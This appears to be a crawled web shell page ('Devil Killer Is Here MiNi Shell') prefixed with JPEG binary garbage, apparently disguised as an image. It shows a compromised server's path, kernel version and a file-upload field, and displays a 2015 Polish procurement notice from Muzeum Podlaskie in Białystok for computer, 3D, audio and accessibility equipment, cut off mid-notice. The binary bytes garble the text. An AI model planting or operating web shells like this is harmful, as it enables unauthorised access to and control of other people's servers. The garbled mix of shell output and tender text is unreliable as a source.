JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151030/292040-N-2015.html

<p class="kh_header"><b>Białystok: Dostawa sprzętu komputerowego oraz sprzętu specjalistycznego w ramach zadania Kultura bez barier</b><br>
<b>Numer ogłoszenia: 292040 - 2015; data zamieszczenia: 30.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Podlaskie w Białymstoku , ul. Ratusz-Rynek Kościuszki 10, 15-426 Białystok, woj. podlaskie, tel. 085 7421473, 7421440.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> muzeum.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego oraz sprzętu specjalistycznego w ramach zadania Kultura bez barier.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia jest planowany do zrealizowania w ramach zadania pn. Kultura bez barier w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2007 - 2013 współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego.

I CZĘŚĆ PRZEDMIOTU ZAMÓWIENIA -SPRZĘT KOMPUTEROWY

Dostawa fabrycznie nowego sprzętu komputerowego wraz z oprogramowaniem do siedziby Zamawiającego, według poniższego zestawienia:
1.	Laptop z oprogramowaniem - 10 zestawów
2.	Drukarka laserowa - 1 sztuka
3.	Tablet - 4 sztuki ( poza realizacją zadania Kultura bez barier)
4.	Przenośny dysk twardy - 1 sztuka ( poza realizacją zadania Kultura bez barier)

Szczegółowy opis części I przedmiotu zamówienia znajduje się w załączniku Nr 1a do SIWZ.

II CZĘŚĆ PRZEDMIOTU ZAMÓWIENIA -  SPRZĘT 3D

Dostawa do siedziby Zamawiającego fabrycznie nowej drukarki 3D wraz ze skanerem 3D i oprogramowaniem - 1 zestaw

Wykonawca w ramach realizacji przedmiotu zamówienia zobowiązuje się do:
1.	Instalacji u klienta sprzętu 3 D oraz do przeszkolenia pracowników w zakresie jego obsługi.
2.	Udzielenia w okresie gwarancji wsparcia technicznego - telefonicznie, mailowo lub poprzez zdalny pulpit komputera w godzinach 9:00 - 17:00, na drodze indywidualnych ustaleń także w siedzibie Zamawiającego
3.	Przeglądów, w ramach wynagrodzenia za dostawę sprzętu,  sprzętu 3 D w okresie gwarancji - raz w roku obejmujących czyszczenie, kalibrację oraz wymianę części wykazujących zużycie eksploatacyjne.
4.	Zapewnienia usługi wsparcia drukowania w okresie gwarancji - w przypadku serwisu drukarki trwającego  dłużej niż 4 dni robocze, Wykonawca gwarantuje wydruk modeli dla Zamawiającego i ich dostawę do 4 dni roboczych od daty przekazania poprawnych plików. Łączny czas druku nie może być dłuższy niż 12 godzin.

Szczegółowy opis części II przedmiotu zamówienia znajduje się w załączniku Nr 1b do SIWZ.

III CZĘŚĆ PRZEDMIOTU ZAMÓWIENIA -  MONITORY INTERAKTYWNE

Dostawa do siedziby Zamawiającego fabrycznie nowych monitorów interaktywnych - 5 sztuk

Szczegółowy opis części III przedmiotu zamówienia znajduje się w załączniku Nr 1c do SIWZ.

IV CZĘŚĆ PRZEDMIOTU ZAMÓWIENIA -  SYSTEMY NAGŁAŚNIAJĄCE 

Dostawa do siedziby Zamawiającego fabrycznie nowych systemów nagłaśniających według poniższego zestawienia:
1.	System nagłaśniający 1 - 1 zestaw
2.	System nagłaśniający 2 - 4 zestawy
3.	System nagłaśniający 3 - 1 zestaw

Wykonawca w ramach realizacji przedmiotu zamówienia zobowiązuje się do:
1.	Instalacji przy użyciu własnych narzędzi i materiałów nagłośnienia zewnętrznego ( część systemu nagłaśniającego nr 1) na terenie Białostockiego Muzeum Wsi/Oddział Muzeum Podlaskiego w Białymstoku, ul. Nadawki 21 C, Wasilków (opis przedmiotu zamówienia w załączniku 1d do SIWZ)
Rozmieszczenie instalacji nagłośnienia zewnętrznego  - rys 1 - Załącznik nr 7 do SIWZ

Szczegółowy opis części IV przedmiotu zamówienia znajduje się w załączniku Nr 1d do SIWZ.

V  CZĘŚĆ PRZEDMIOTU ZAMÓWIENIA -  SPRZĘT SPECJALISTYCZNY

Dostawa do siedziby Zamawiającego fabrycznie nowego sprzętu specjalistycznego według poniższego zestawienia:
1.	Wygrzewarka - 8 zestawów
2.	Oprogramowanie - program powiększający, udźwiękowiający i ubrajlawiający środowisko Windows - 1 sztuka
3.	Drukarka brajlowska - 1 sztuka
4.	Multilektor - 1 zestaw
5.	Powiększalnik ekranowy - 3 zestawy
Szczegółowy opis części V przedmiotu zamówienia znajduje się w załączniku Nr 1e do SIWZ.

Pozostałe warunki zamówienia ( dotyczy wszystkich części przedmiotu zamówienia):
1.	Sprzęt i oprogramowanie musza być dostarczone do siedziby Muzeum Podlaskiego w Białymstoku, Ratusz Rynek Kościuszki 10, ( z wyjątkiem nagłośnienia zewnętrznego z IV części przedmiotu zamówienia, które należy zainstalować na terenie Białostockiego Muzeum Wsi/Oddział Muzeum Podlaskiego w Białymstoku) 
2.	Wykonawca zobowiązany będzie do udzielenia gwarancji door -to-door,
3.	Wykonawca zobowiązany będzie do usunięcia awarii dostarczonego sprzętu w okresie gwarancji w ciągu 48 godzin od chwili zgłoszenia awarii, w przypadku dłuższej naprawy - dostarczenie sprzętu zamiennego o porównywalnych (nie słabszych) parametrach,
4.	Wykonawca udziela Zamawiającemu gwarancji na dostarczony sprzęt i oprogramowanie zgodnie z treścią Załączników 1a- 1e do SIWZ (szczegółowe opisy przedmiotu zamówienia dla każdej z części)
5.	Wykonawca zobowiązany będzie do zapewnienia bezpłatnego serwisu gwarancyjnego w okresie udzielonej gwarancji,
6.	Okres naprawy sprzętu w trakcie okresu gwarancji (od daty upływu 48 godzin od zgłoszenia do daty odbioru sprzętu po naprawie) przedłuża okres udzielonej gwarancji.
7.	Wykonawca dostarczy razem ze sprzętem instrukcje obsługi w języku polskim..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.19.62.00-2, 30.21.31.00-6, 30.21.32.00-7, 48.00.00.00-8, 30.23.21.10-8, 30.23.21.00-5, 30.21.61.10-0, 30.23.13.20-6, 32.32.20.00-6, 32.34.24.00-6, 32.34.20.00-2, 32.34.21.00-3, 32.34.22.00-4, 32.34.23.00-5, 32.34.24.12-3, 30.20.00.00-1, 30.23.13.00-0, 38.65.22.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium w wysokości:
- I część przedmiotu zamówienia 1.000,00 zł (słownie: jeden tysiąc zł 00/100).
- II część przedmiotu zamówienia 1.000,00 zł (słownie: jeden tysiąc zł 00/100).
- III część przedmiotu zamówienia 1.500,00 zł (słownie: jeden tysiąc pięćset zł 00/100)
- IV część przedmiotu zamówienia 1.000,00 zł ( słownie: jeden tysiąc zł 00/100)
- V część przedmiotu zamówienia 1.500,00 zł ( słownie: jeden tysiąc pięćset zł 00/100)
2.	Wadium może być wniesione w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych, 
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).
3.	Wadium w formie pieniężnej należy wnieść na rachunek bankowy Zamawiającego:
Bank Pekao A. A. O/ Białystok
04 1240 5211 1111 0000 4919 5527
4.	Wadium wnoszone w formie poręczeń lub gwarancji należy złożyć w formie oryginału w sekretariacie Muzeum Podlaskiego w Białymstoku, Ratusz Rynek Kościuszki 10, 15-426 Białystok. 
5.	Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta (Poręczyciela). Gwarancja (poręczenie) musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta (Poręczyciela). Podpis powinien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji (poręczenia) powinno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta (Poręczyciela) do wypłaty Zamawiającemu pełnej kwoty wadium z tytułu wystąpienia zdarzeń określonych w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych. 
6.	W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia (w konsorcjum), wadium to powinno obejmować zobowiązanie Gwaranta (Poręczyciela) z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań każdego z nich.
7.	Wadium musi być wniesione przed upływem terminu składania ofert.
8.	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym 
w rozdziale XVIII pkt 2 terminie znajdzie się na rachunku bankowym Zamawiającego.
9.	Wykonawca, który nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia  o spełnianiu warunków udziału w postępowaniu, składanego przez wykonawcę  w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust.1 Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia  o spełnianiu warunków udziału w postępowaniu, składanego przez wykonawcę  w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust.1 Pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia  o spełnianiu warunków udziału w postępowaniu, składanego przez wykonawcę  w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust.1 Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia  o spełnianiu warunków udziału w postępowaniu, składanego przez wykonawcę  w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust.1 Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia  o spełnianiu warunków udziału w postępowaniu, składanego przez wykonawcę  w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust.1 Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony zgodnie z treścią i podpisany formularz Oferta, stanowiący Załącznik Nr 2 wraz z załącznikiem nr 1 do oferty ( Ofertę wraz z załącznikiem wypełnić oddzielnie dla każdej części przedmiotu zamówienia) 

2)	Karty katalogowe ze specyfikacją oferowanego sprzętu - do każdej pozycji zamówienia potwierdzające, że sprzęt spełnia minimalne parametry wymagane przez Zamawiającego</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie:
a) zmian przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym ustawowej zmiany stawki podatku VAT - w takim przypadku wynagrodzenie Wykonawcy określone w umowie zostanie odpowiednio zwaloryzowane z uwzględnieniem nowej stawki podatku VAT,
c) zaistnienia siły wyższej i innych zdarzeń losowych, w szczególności takich jak: pożar, powódź, promieniowanie lub skażenie, zamieszki, strajki, ataki terrorystyczne, nagłe załamania pogody, nagłe przerwy w dostawie energii elektrycznej
d) zmiany przedstawicieli stron umowy,
e) jeżeli konieczność zmiany jest spowodowana wystąpieniem niezależnych od stron okoliczności, których nie można było przy dołożeniu należytej staranności przewidzieć w chwili zawarcia umowy, a które uniemożliwiają prawidłową realizację przedmiotu umowy zgodnie z jej postanowieniami, tj. działania siły wyższej,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przetargi.wrotapodlasia.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Podlaskie w Białymstoku
Ratusz Rynek Kościuszki 10
15-426 Białystok
Dział Administracyjno-Gospodarczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.11.2015 godzina 09:30, miejsce: Sekretariat  Muzeum Podlaskiego w Białymstoku
Ratusz - Rynek Kościuszki 10
15-426 Białystok.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest planowany do zrealizowania w ramach zadania pn.Kultura bez barier w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2007 - 2013 współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sprzęt komputerowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa fabrycznie nowego sprzętu komputerowego wraz z oprogramowaniem do siedziby Zamawiającego, według poniższego zestawienia:
1.	Laptop z oprogramowaniem - 10 zestawów
2.	Drukarka laserowa - 1 sztuka
3.	Tablet - 4 sztuki ( poza realizacją zadania Kultura bez barier)
4.	Przenośny dysk twardy - 1 sztuka ( poza realizacją zadania Kultura bez barier)

Szczegółowy opis części I przedmiotu zamówienia znajduje się w załączniku Nr 1a do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.21.32.00-7, 48.00.00.00-8, 30.23.21.10-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> SPRZĘT 3D.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa do siedziby Zamawiającego fabrycznie nowej drukarki 3D wraz ze skanerem 3D i oprogramowaniem - 1 zestaw

Wykonawca w ramach realizacji przedmiotu zamówienia zobowiązuje się do:
1.	Instalacji u klienta sprzętu 3 D oraz do przeszkolenia pracowników w zakresie jego obsługi.
2.	Udzielenia w okresie gwarancji wsparcia technicznego - telefonicznie, mailowo lub poprzez zdalny pulpit komputera w godzinach 9:00 - 17:00, na drodze indywidualnych ustaleń także w siedzibie Zamawiającego
3.	Przeglądów, w ramach wynagrodzenia za dostawę sprzętu,  sprzętu 3 D w okresie gwarancji - raz w roku obejmujących czyszczenie, kalibrację oraz wymianę części wykazujących zużycie eksploatacyjne.
4.	Zapewnienia usługi wsparcia drukowania w okresie gwarancji - w przypadku serwisu drukarki trwającego  dłużej niż 4 dni robocze, Wykonawca gwarantuje wydruk modeli dla Zamawiającego i ich dostawę do 4 dni roboczych od daty przekazania poprawnych plików. Łączny czas druku nie może być dłuższy niż 12 godzin.

Szczegółowy opis części II przedmiotu zamówienia znajduje się w załączniku Nr 1b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.00-5, 30.21.61.10-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> MONITORY INTERAKTYWNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa do siedziby Zamawiającego fabrycznie nowych monitorów interaktywnych - 5 sztuk

Szczegółowy opis części III przedmiotu zamówienia znajduje się w załączniku Nr 1c do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.13.20-6, 32.32.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> SYSTEMY NAGŁAŚNIAJĄCE.</p>
